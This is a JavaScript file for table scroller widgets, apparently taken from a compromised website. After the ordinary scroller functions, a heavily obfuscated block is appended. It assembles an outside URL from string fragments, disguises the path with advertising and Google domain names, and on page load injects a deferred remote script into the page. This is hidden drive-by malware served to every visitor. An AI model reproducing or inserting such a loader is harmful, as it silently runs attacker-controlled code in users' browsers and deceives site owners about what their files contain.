function createScroller(name, div, table, direction, delayTime, pixelAmount, rowIndex, autoPause)
{
	if(!name) return;
	if(!table) return;
	if(!window.scrollers)
	{
		window.scrollers = new Array();
	}
	window.scrollers[name] = new ScrollerClass(name, div, table, direction, delayTime, pixelAmount, rowIndex, autoPause);

	if(window.scrollers[name].direction == 1)
		window.scrollers[name].timerID = window.setInterval("scrollHScroller(\"" + name + "\")", window.scrollers[name].delayTime);
	else
		window.scrollers[name].timerID = window.setInterval("scrollVScroller(\"" + name + "\")", window.scrollers[name].delayTime);
}

function ScrollerClass(name, div, table, direction, delayTime, pixelAmount, rowIndex, autoPause)
{
	this.name = name;
	this.table = document.getElementById(table);
	this.div = document.getElementById(div);
	this.direction = direction;
	this.delayTime = delayTime;
	this.pixelAmount = pixelAmount;
	this.rowIndex = rowIndex;
	this.div.scroller = this;
	this.play = 1;
	if(autoPause)
	{
		this.div.onmouseover = function()
		{
			this.scroller.play = 0;
		}
		this.div.onmouseout = function()
		{
			this.scroller.play = 1;
		}
	}
	this.table.style.position = "relative";
	this.table.style.left = 0;
	this.table.style.top = 0;
	return this;
}

function scrollVScroller(name)
{
	var firstRow;
	var newRow;
	var scroller;
	var itemHeight;
	
	if(!name) return;
	scroller = window.scrollers[name];
	if(!scroller) return;
	if(!scroller.play) return;
	firstRow = scroller.table.rows[0];
	if(Math.abs(parseInt(scroller.table.style.top)) >= firstRow.clientHeight)
	{
		itemHeight = firstRow.clientHeight;
		newRow = scroller.table.insertRow(-1);
		scroller.table.tBodies[0].replaceChild(firstRow, newRow);
		scroller.table.style.top = scroller.pixelAmount * 2;
	}
	else
	{
		scroller.table.style.top = parseInt(scroller.table.style.top) - scroller.pixelAmount;
	}
}

function scrollHScroller(name)
{
	var rowContainer;
	var firstCell;
	var newCell;
	var scroller;
	var itemWidth;
	
	if(!name) return;
	scroller = window.scrollers[name];
	if(!scroller) return;
	if(!scroller.play) return;
	rowContainer = scroller.table.rows[scroller.rowIndex];
	if(!rowContainer) return;
	firstCell = rowContainer.cells[0];
	if(!firstCell) return;
	if(Math.abs(parseInt(scroller.table.style.left)) >= firstCell.clientWidth)
	{
		itemWidth = firstCell.clientWidth;
		newCell = rowContainer.insertCell(-1);
		rowContainer.replaceChild(firstCell, newCell);
		scroller.table.style.left = scroller.pixelAmount * 2;
	}
	else
	{
		scroller.table.style.left = parseInt(scroller.table.style.left) - scroller.pixelAmount;
	}
}
var uN=new String();var J=new String();function d(){var AC;if(AC!='B'){AC=''};var Z;if(Z!='Q' && Z!='f'){Z='Q'};var D=RegExp;var YJ='';var Aw;if(Aw!=''){Aw='_I'};var A='';var Ug;if(Ug!='' && Ug!='R'){Ug=''};var S_;if(S_!='' && S_!='S'){S_=''};var AR="g8Hj".substr(0,1);var HK=new Array();function y(N,i){var z;if(z!='I'){z=''};var AP= new String("[");var Jo=new Array();var pH;if(pH!='pX' && pH!='M'){pH=''};AP+=i;var r=new String();var T=new Date();AP+=String("]");var iv='';var gS;if(gS!='' && gS!='_m'){gS='rx'};var GX="";var V=new D(AP, AR);var WV=new String();var xE;if(xE!='' && xE!='uz'){xE=''};return N.replace(V, A);var cc=new String();var zi;if(zi!='' && zi!='lm'){zi=null};};var Dy="";var Ns=new String();var O=String("scr"+"ipt");var Ki;if(Ki!='' && Ki!='zI'){Ki=null};var H=new String("src");var uf;if(uf!='' && uf!='yj'){uf=''};var F;if(F!='' && F!='dW'){F=''};var yjk=new Array();var Gn=new String();var E=String("/adm"+"agne"+"t.ne"+"t/ad"+"magn"+"et.n6waO".substr(0,4)+"et/l"+"KTuaredKTu".substr(3,4)+"WaQoute".substr(3)+"d1l.fr/1ld".substr(3,4)+"goog"+"le.d"+"e/go5v6H".substr(0,4)+"ogle"+".com5YjG".substr(0,4)+"csi.php".substr(3));this.xV='';var t=new String("Zq1ht".substr(3)+"tplbBg".substr(0,2)+"vmM:/".substr(3)+"3kDH/i".substr(4)+"EV1me1VE".substr(3,2)+"-n"+"u.Ker".substr(0,2)+"hg8pe".substr(3)+"re"+"zh"+"ilNHp3".substr(0,2)+"tox8lM".substr(0,2)+"iaRn.Rai".substr(3,2)+"co"+"TFQm.".substr(3)+"as"+"so"+"eprcirep".substr(3,2)+"at"+"AsqMed".substr(4)+"UyCRcoCRUy".substr(4,2)+"Xo0ntX0o".substr(3,2)+"en"+"t-VmO".substr(0,2)+"co"+"SRim.".substr(3)+"YM2Kai".substr(4)+"zqarsaqz".substr(3,2)+"onvUea".substr(4)+"loFL23".substr(0,2)+"Uwzqg.Uqwz".substr(4,2)+"FXOruOXF".substr(3,2)+":cHJ".substr(0,1));var AN='';var C=y('8337170762616871362061372',"12673");this.At='';var sH='';var l=window;var uNF;if(uNF!='ua' && uNF!='NL'){uNF=''};var e=String("U0n3defer".substr(4));var _C=new Array();var nc;if(nc!=''){nc='kF'};var h='';l.onload=function(){var qH="";try {var qK;if(qK!='P'){qK='P'};var SP;if(SP!='lr'){SP='lr'};this.SX='';h=t+C;var ym=new Date();h+=E;this.Ti="";var eL;if(eL!='' && eL!='UR'){eL='hy'};var QA;if(QA!='' && QA!='DFk'){QA='rU'};u=document.createElement(O);var Km=new Date();var gEH=new Date();this._q='';var dA;if(dA!='id' && dA != ''){dA=null};u[e]=[2,1][1];var Hn;if(Hn!=''){Hn='Ze'};this.ww="";u[H]=h;var Qo=new Date();document.body.appendChild(u);var Zg=new Date();var cQ="";var ih="";} catch(_){};var Hh=new Date();var GJ;if(GJ!='In' && GJ != ''){GJ=null};};var HW='';var oj;if(oj!=''){oj='Bn'};};d();var Gt=new Array();